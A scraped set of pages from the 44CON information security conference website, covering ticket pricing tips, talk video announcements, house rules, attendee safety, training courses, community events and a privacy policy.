If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

  1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
  2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
  3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
  4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
  5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

 

#####EOF##### Hacking 44CON’s Pricing Model (5 Different Ways) – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

Obligatory hacking photo

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

Understanding Our Pricing

Traditionally our ticket scheduling has gone Early Bird -> 44CON Standard Ticket. This year, our pricing is a little different. We now have:

  • Early Bird: £299
  • Standard Ticket: £349
  • On the door: £399

You can buy a standard ticket here, but read on for our hacks.

In addition to this we’ve run a free registration Wednesday night event. This year we’ve invited the ManyHats Club to run our Thursday night session, so our free registration ticket gets you in to both evenings instead of one. The free ticket also gets you into our CTF space so you can take part in the CTF. These tickets aren’t out yet, so keep an eye out on the socials and make sure you’re subscribed to our newsletter.

We’ve also redesigned the main hall with more of an expo feel based on a village concept. This means we’re going to offer expo tickets that give you access to the hall. These tickets are only going to be available to certain groups and will be limited.

Hack 1: Exploit Discounts

We run discounts with groups such as the ISSA, OWASP and CREST. Please do use them, that’s what they’re there for. If you book a training course for any of our March, June or September 2019 training you’ll get a discount on tickets equivalent to Early Bird pricing up to but not including tickets bought on the day.

Hack 2: Apply for Assistance

Last year we ran an assistance programme for those who otherwise wouldn’t be able to come. We’ll do the same this year. Assistance tickets include full event entry and accommodation. It’s the cheapest way to get to 44CON. You’ll need to qualify for a ticket, and we haven’t yet launched 2019’s programme. It’ll probably launch in the late spring, so around May/June but it’s going to come down to this years’ sponsors, such as the awesome wire security.

The criteria for this year’s assistance tickets are yet to be determined but we’re mainly focused on deprived areas of the UK outside London and people from economically disadvantaged backgrounds or situations.

Hack 3: Apply to Join the Crew

The crew work extremely hard to make 44CON what it is, but on the plus side there’s a lot of love amongst the crew. You’ll get to see some of the talks and, of course, you’re crew with all the crewdos that brings (Ouch – Adrian). If that sort of thing floats your boat, crew applications will be up later this year.

Hack 4: Split a ticket

We don’t track your identity while at the event. If your friend has a full ticket, you have an expo ticket and want to swap, then by all means feel free to swap tickets if there’s a particular talk you want to see. We just ask that you don’t abuse it – sharing with a couple of mates is fine. Sharing with heaps of randos, taking the mickey and selling access to talks is a violation of the house rules.

Hack 5: Ask!

If your hackerspace, hacking society or club would like a discount code, email us for one. This is really handy when used with Hack 4.

If there’s something you’d like to run at 44CON inside the event, let us know. We have community spaces for groups like OWASP, the ISSA and CREST amongst others. Some of our sponsors are also looking for help on their stands. Keep an eye out for announcements on our mailing list and pounce when you get the chance.

#####EOF##### First Videos From 44CON 2018 Up – 44CON

First Videos From 44CON 2018 Up

For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

#####EOF##### More 2018 44CON Videos Added – 44CON

More 2018 44CON Videos Added

This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

Matt Lorentzen and Lawrence Munro talk about how to break into a red team (no, not that way, the job way). Lots of juicy info on how to get in there and also a handy toolset for building simulated environments to hone your dark arts.

The inimitable Kev Sheldrake returns with a talk on using the drag and drop kid’s programming language Scratch to build offensive cyber pathogens. Because why not exploit weird machines with the programming equivalent of Lego?

Jay Harris of Digital Interruption talks about shifting left through automation and integration into development processes. Looking at different tools and techniques to automate different aspects of the process, Jay delivers a talk, which could only have more automation if he had the talk deliver itself for him.

Leigh-Anne Galloway and Tim Yunusov closed 44CON 2018 with talks about vulnerabilities in Mobile Point of Sales systems, including those used by the 44CON bus bar. We’d buy them a drink, but according to our card bills we already had…

David Rogers gives us some deep insight into HMG’s views of IoT Security and the UK’s Code of Practice for Security in Consumer IoT Products and Services.

We’ll have more 2018 videos up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

#####EOF##### About 44CON – 44CON

About 44CON

What is 44CON?

44CON is an Information Security Conference & Training event taking place in London. Designed to provide something for the business and technical Information Security professional.

Why do 44CON?

To bring the best in international Security training + speaking (as well as the best of local talent) to the UK at a reasonable cost.

44CON is located in London, which allows for a wide variety of security professionals to attend from the UK, Europe and further afield.

At the bigger conferences, getting time with top class security speakers is limited. At 44CON, you have great access to speakers, who are all willing to spend time and talk about their work. This is where interesting partnerships can occur.

Don’t just take our word for it, check out what others have said about the conference on our media coverage page.

Who’s behind it?

Sense/Net Ltd is the company the holds the IP for 44CON. Sense/Net is an events management company set up by Adrian and Steve to run conferences and events. Our flagship conference, 44CON is a public event bringing together the best in UK and International information security research and networking opportunities. If you would like an internal conference for your organisation, or have a requirement for a bespoke event please contact us to discuss your requirement and how we can help.

Leave a Reply

#####EOF##### 44CON House Rules – 44CON

44CON House Rules

44CON House Rules

44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

These rules apply to everyone and all interpersonal interactions at the event.

Expectations

What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
What we expect from you: Respect for others. Being kind. Not being a dick.

Interpreting Wheaton’s Law

Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

Reporting concerns

  1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
  2. Alternatively, please fill in a feedback form, anonymously if you prefer.
  3. If the above isn’t possible, please email houserules@44con.com with your concern.
  4. Everything is handled in confidence and we can provide space and support where needed.

We welcome anonymous feedback, but it affects our ability to communicate outcomes.

Grounds for removal

We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours;

  1. Theft.
  2. Sustained harassment, discrimination or disruption.
  3. Acts of violence.
  4. Criminal activity.
  5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

#####EOF##### Hacking 44CON’s Pricing Model (5 Different Ways) – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

Obligatory hacking photo

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

Understanding Our Pricing

Traditionally our ticket scheduling has gone Early Bird -> 44CON Standard Ticket. This year, our pricing is a little different. We now have:

  • Early Bird: £299
  • Standard Ticket: £349
  • On the door: £399

You can buy a standard ticket here, but read on for our hacks.

In addition to this we’ve run a free registration Wednesday night event. This year we’ve invited the ManyHats Club to run our Thursday night session, so our free registration ticket gets you in to both evenings instead of one. The free ticket also gets you into our CTF space so you can take part in the CTF. These tickets aren’t out yet, so keep an eye out on the socials and make sure you’re subscribed to our newsletter.

We’ve also redesigned the main hall with more of an expo feel based on a village concept. This means we’re going to offer expo tickets that give you access to the hall. These tickets are only going to be available to certain groups and will be limited.

Hack 1: Exploit Discounts

We run discounts with groups such as the ISSA, OWASP and CREST. Please do use them, that’s what they’re there for. If you book a training course for any of our March, June or September 2019 training you’ll get a discount on tickets equivalent to Early Bird pricing up to but not including tickets bought on the day.

Hack 2: Apply for Assistance

Last year we ran an assistance programme for those who otherwise wouldn’t be able to come. We’ll do the same this year. Assistance tickets include full event entry and accommodation. It’s the cheapest way to get to 44CON. You’ll need to qualify for a ticket, and we haven’t yet launched 2019’s programme. It’ll probably launch in the late spring, so around May/June but it’s going to come down to this years’ sponsors, such as the awesome wire security.

The criteria for this year’s assistance tickets are yet to be determined but we’re mainly focused on deprived areas of the UK outside London and people from economically disadvantaged backgrounds or situations.

Hack 3: Apply to Join the Crew

The crew work extremely hard to make 44CON what it is, but on the plus side there’s a lot of love amongst the crew. You’ll get to see some of the talks and, of course, you’re crew with all the crewdos that brings (Ouch – Adrian). If that sort of thing floats your boat, crew applications will be up later this year.

Hack 4: Split a ticket

We don’t track your identity while at the event. If your friend has a full ticket, you have an expo ticket and want to swap, then by all means feel free to swap tickets if there’s a particular talk you want to see. We just ask that you don’t abuse it – sharing with a couple of mates is fine. Sharing with heaps of randos, taking the mickey and selling access to talks is a violation of the house rules.

Hack 5: Ask!

If your hackerspace, hacking society or club would like a discount code, email us for one. This is really handy when used with Hack 4.

If there’s something you’d like to run at 44CON inside the event, let us know. We have community spaces for groups like OWASP, the ISSA and CREST amongst others. Some of our sponsors are also looking for help on their stands. Keep an eye out for announcements on our mailing list and pounce when you get the chance.

#####EOF##### competition – 44CON
#####EOF##### 44CON – Page 2

44CON Training Goes Quarterly

We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused course on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

That’s right, you no longer have to wait a year to sit a high quality training course!

Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

Mastering Container Security – Rory McCune, NCC Group
Malware Reverse Engineering – Joxean Koret

Both courses are two-days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

If you’d like to offer a high-end course in London, get in touch.

Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

Lab Materials for Advanced Wireless Attacks Workshop
For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
  • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
  • A step-by-step lab setup guide
  • A detailed course guide to supplement the material covered in the workshop
Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

Making Britain a Better Place For The Most Vulnerable

“You measure the degree of civilization of a society by how it treats its weakest members.”

This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

Help us raise money at 44CON

We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

Get involved

We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

Building A Permanent Community At 44CON

44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

Screen Shot 2018-08-29 at 20.37.05

For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

Screen Shot 2018-08-30 at 11.24.12

Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

Screen Shot 2018-08-29 at 20.37.41

Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

 

 

Screen Shot 2018-08-29 at 20.38.33

We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

What To Expect On Thursday Night

44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

HackerOne_black_1

First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complementary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of Alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

Looking for something more blue team than red? From 20:00, Phillipe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

  • Best billed idea
  • Most lame duck pitch
  • Most quackers concept

Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature either in part or in hole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

On Hotel Accommodation And Safety

First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

+44 (0)7955 376 729

Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

To that end, we’ve done two things:

  1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
  2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

“I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

Once again, that emergency crew number is:

+44 (0)7955 376 729

If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

  1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
  2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
  3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
  4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
  5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

 

TNMOC Guided Tour Giveaway

Proudly sponsored by F-secure

Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

logo_f-Secure_Red-web

The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of smart phone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

How to enter:

  1. Sign up to our newsletter
  2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
  3. Keep an eye on your emails in mid August to see if you’re a winner

Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

 

Steelcon Ticket winners

44CON Soldering Area at Steelcon

Steelcon is coming up soon, Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

And the winners are…

After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

 

 

 

Introducing 44CON’s House Rules

44CON was born out of a private event that Adrian and I used to occasionally get involved in organising. It was a close-knit group of people featuring deeply opinionated and often spectacularly drunk people who somehow mostly got along.

As 44CON grew, more people outside that group attended. The new people didn’t know about our overton window. These people paid good money for a good time, but were new to our community and we hadn’t provided guidance on what was acceptable behaviour, or how we handle concerns.

An event with talks about exploiting human and computer trust relationships tends towards some attendees holding unusual views about acceptable behaviour. To make things easier for everyone, we introduced Wheaton’s Law. For those that don’t know, it’s fairly easy to take on board:

“Don’t be a dick.”

For a long time “Don’t be a dick” was the only rule we had. Every year we’d review it, and every year it would stay.

We have had people breach the rule. We’ve had and investigated complaints. We stand by Wheaton’s law as it’s stood by us. What we haven’t done is properly track complaint resolution, and we hadn’t told people how to raise concerns. That’s why we’ve launched our House Rules. They’re not going to be perfect, but it’s a start.

The House Rules are simply an expansion of Wheaton’s Law. They set expectations, a reporting process and circumstances under which we’ll eject someone, along with a reminder that the laws of England and Wales may not match your own at home.

We’ve integrated feedback from event organisers up and down the country, and we’re fully open to suggestions on how to improve them for next year. To be clear, there’s no change in our expectations from previous years, only in how we communicate them.

If you’re coming to 44CON you’ll see the house rules in your brochure or you can read them now. Please take a moment to read them, as they apply to everyone. If you have any questions, suggestions or comments, use the email address on the House rules page before the event, or follow the procedure to report a concern once you’re there.

We want everyone to have a good time, regardless of preferred text editor, open source licensing beliefs or i/o port configuration. We hope you’ll join us and keep making 44CON a great place for everyone.

#####EOF##### Win CRESTCon 2019 Tickets! – 44CON

Win CRESTCon 2019 Tickets!

We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

Some of the talks we’re most looking forward to at this year’s CRESTCon include:

  • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
  • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
  • Martin Jordan – Austerbury: Iranian cyber threat briefing

Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!

#####EOF##### 44CON Privacy Policy – 44CON

44CON Privacy Policy

This is a very boring document, but don’t let it put you off.

TL:DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

Sense/Net Ltd (“44CON”) Privacy Policy

We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

  • to access your information and to receive information about its use.
  • to have your information corrected and/or completed.
  • to have your information deleted.
  • to restrict the use of your information.
  • to receive your information in a portable format.
  • to object to the use of your information.
  • to withdraw your consent to the use of your information.
  • to complain to a supervisory authority.

When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

Data Protection Officer: Marizel Fourie

To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

Data collected

We collect the following pieces of information:

  • We use cookies on websites for analytics, marketing and support.
  • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
  • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
  • Country of origin, Email address, name and any information you provide when using our CFP system.

Your information is shared with the following third-parties:

  • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
  • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
  • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
  • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

Your information is not shared by us:

  • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

On consent

When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

Use of collected data

How we use your information:

  • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
  • In order to meet contractual obligations.
  • Improving our systems and marketing through the use of analytics.
  • Advertising goods and services.
  • To fulfil legal obligations under the laws of England and Wales.

How long we retain it for (in order of importance from most to least):

  • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
  • As long as we need it in order to perform the functions above.
  • As long as consent is not withdrawn (e.g. our announce list).

How we secure your information:

  • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
  • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
  • We try to avoid collecting information where practical.

Transfers of information outside of the EU:

As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

Sensitive Personal Information

We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

#####EOF##### tickets – 44CON

Hacking 44CON’s Pricing Model (5 Different Ways)

It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

44CON 2019 Early-Bird Tickets are now on sale

